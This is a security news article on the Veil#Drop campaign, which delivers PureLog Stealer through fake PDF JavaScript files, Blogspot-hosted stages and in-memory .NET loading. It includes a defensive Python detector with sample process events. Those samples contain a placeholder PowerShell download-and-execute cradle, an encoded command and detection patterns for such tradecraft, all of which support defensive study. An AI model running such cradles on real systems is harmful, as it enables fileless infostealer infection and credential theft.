
Blogspot used in stealth infostealer campaign

A fileless malware framework is abusing Google’s Blogspot platform to deliver PureLog Stealer directly into computer memory, sharpening concerns that trusted web services are being turned into staging grounds for credential theft.

The campaign, tracked as Veil#Drop, begins with a JavaScript file disguised as a document, such as “transcript.pdf.js”. Once opened on a Windows system, the file runs through Windows Script Host and launches PowerShell with execution-policy bypasses enabled. The command then retrieves further payloads from attacker-controlled Blogspot pages, allowing the malicious traffic to blend with ordinary access to Google-owned infrastructure.

Security researchers said the framework loads PureLog Stealer through a chain of PowerShell download cradles, XOR-obfuscated code and .NET reflection, avoiding the need to write a conventional executable file to disk. The final payload is designed to harvest browser credentials, cookies, autofill data, browsing history, cryptocurrency wallet details and system information.


The use of Blogspot marks a notable escalation in the misuse of mainstream cloud and publishing platforms. By staging payloads on a familiar domain, attackers can reduce suspicion and weaken reputation-based blocking. The technique also complicates incident response because defenders may be reluctant to block an entire trusted service without disrupting legitimate users.

Veil#Drop relies heavily on native Windows tools. The initial JavaScript launcher spawns PowerShell, which retrieves and executes code in memory. Later stages reconstruct encrypted .NET assemblies at runtime and load them through reflection. The framework also includes fallback execution through Microsoft-signed utilities such as RegSvcs, InstallUtil, MSBuild, CSC, VBC and AspNet_Compiler, a tactic often described as “living off the land” because it uses legitimate binaries already present on the system.

The campaign’s social-engineering component remains central to its success. Attackers use double extensions and document-themed names to exploit the way many Windows systems hide known file extensions by default. A victim may see what appears to be a PDF, while the operating system executes a JavaScript file. The approach does not require a software vulnerability; it relies on trust, routine office behaviour and poor visibility into file types.

PureLog Stealer has become a persistent presence in credential-theft campaigns over the past year. Earlier operations used copyright complaint lures, invoice themes, purchase-order messages and malicious archives to push PureLogs variants at organisations and individuals. Other delivery chains have used encrypted payloads hidden inside image files, process hollowing and PowerShell-based loaders to evade static inspection.

The malware family is valued by criminals because stolen browser cookies and session tokens can bypass some multi-factor authentication protections. Once a session token is taken from an infected device, attackers may be able to access cloud email, business applications or cryptocurrency accounts without needing the victim’s password again. That risk is especially acute for finance teams, media organisations, government offices and small businesses that rely heavily on browser-based services.

The campaign also reflects a broader shift away from noisy malware droppers towards modular infection chains. Rather than placing a full malicious executable on the endpoint, attackers use small launchers, trusted services, encrypted blobs and memory-only execution. Each stage performs a narrow task, making detection harder and giving operators room to update infrastructure quickly if a domain or payload is blocked.

For defenders, the case highlights the limits of signature-based antivirus tools. Useful warning signs include unusual parent-child process chains such as wscript.exe launching powershell.exe, PowerShell using Invoke-RestMethod or Invoke-Expression to fetch remote content, encoded command execution, unexplained access to Blogspot URLs from endpoints, and .NET assemblies being loaded directly into memory. Monitoring trusted Microsoft utilities for abnormal execution is also becoming more important as attackers increasingly use them as fallback launch paths.
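The warning signs listed above, together with the double-extension lure described earlier, can be turned into simple process-creation heuristics. The following Python script is an added example written for this article; it is not code from the researchers who tracked Veil#Drop. It runs over a handful of constructed Sysmon-style events (the paths, the Blogspot hostname and the encoded blob are invented placeholders) and tags each event with the behaviours it exhibits: a script host spawning PowerShell, a download cradle, an execution-policy bypass, an encoded command, a Blogspot fetch, a reflective assembly load, a double-extension script launch, and a .NET utility spawned by PowerShell.

```python
import re

# Constructed sample events in a Sysmon Event ID 1-like shape. Everything here
# is invented for illustration: file paths, the Blogspot hostname and the
# base64 blob are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\transcript.pdf.js"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ('powershell.exe -nop -w hidden -ep bypass -c '
                 '"iex (irm https://placeholder-lure.blogspot.com/p/stage2.html)"')},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand SQBFAFgAIAAuAC4ALgA="},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "[Reflection.Assembly]::Load($raw)"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r"csc.exe /noconfig /nologo /out:C:\Users\alice\AppData\Local\Temp\a.dll a.cs"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Git\cmd\git.exe",
     "cmdline": "git pull"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# The Microsoft-signed utilities the article names as fallback launch paths.
DOTNET_UTILS = {"regsvcs.exe", "installutil.exe", "msbuild.exe",
                "csc.exe", "vbc.exe", "aspnet_compiler.exe"}

# Cmdlets and their aliases that fetch or evaluate remote content.
DOWNLOAD_CRADLE = re.compile(
    r"\b(invoke-restmethod|irm|invoke-webrequest|iwr|invoke-expression|iex|downloadstring)\b",
    re.I)
# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
ENCODED = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)
EXEC_POLICY_BYPASS = re.compile(r"(^|\s)-(ep|ex|exec|executionpolicy)\s+bypass\b", re.I)
BLOGSPOT = re.compile(r"https?://[\w.-]*blogspot\.com", re.I)
REFLECTION = re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I)
# Document-looking name followed by a script-host extension, e.g. transcript.pdf.js
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.(js|jse|vbs|vbe|wsf|hta)(\"|'|\s|$)", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(ev: dict) -> list[str]:
    """Return the list of suspicious behaviours seen in one process-creation event."""
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    findings = []
    if parent in SCRIPT_HOSTS and image in SHELLS:
        findings.append("script-host-spawns-powershell")
    if image in SCRIPT_HOSTS and DOUBLE_EXT.search(cmd):
        findings.append("double-extension-script-launch")
    if image in SHELLS:
        if DOWNLOAD_CRADLE.search(cmd):
            findings.append("download-cradle")
        if EXEC_POLICY_BYPASS.search(cmd):
            findings.append("execution-policy-bypass")
        if ENCODED.search(cmd):
            findings.append("encoded-command")
        if REFLECTION.search(cmd):
            findings.append("reflective-assembly-load")
    if BLOGSPOT.search(cmd):
        findings.append("blogspot-fetch")
    # Noisy on its own (Add-Type legitimately invokes csc.exe); useful in context.
    if image in DOTNET_UTILS and parent in SHELLS:
        findings.append("dotnet-utility-spawned-by-powershell")
    return findings


def severity(findings: list[str]) -> str:
    """Crude tiering: several behaviours on one event is a strong chain signal."""
    if len(findings) >= 3:
        return "high"
    return "medium" if findings else "none"


def triage(events: list[dict]) -> list[tuple[int, list[str], str]]:
    """Index, findings and severity for every event that triggered a rule."""
    out = []
    for i, ev in enumerate(events):
        f = analyse_event(ev)
        if f:
            out.append((i, f, severity(f)))
    return out


if __name__ == "__main__":
    for idx, found, sev in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {sev:6s} {', '.join(found)}")
```

Each rule is deliberately narrow, as the article suggests; the value comes from correlating them on one host within a short window (script host, then PowerShell with a cradle pointing at Blogspot, then a reflective load or a .NET utility) rather than from alerting on any single hit, since Add-Type and administrative scripts trigger some of these in isolation.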

The practical response is less about blocking one platform and more about tightening execution controls. Organisations can reduce exposure by showing file extensions by default, restricting Windows Script Host where it is not required, applying PowerShell logging and constrained language mode, monitoring command-line activity, limiting outbound traffic from user endpoints, and using behavioural detection capable of flagging memory-only malware chains.
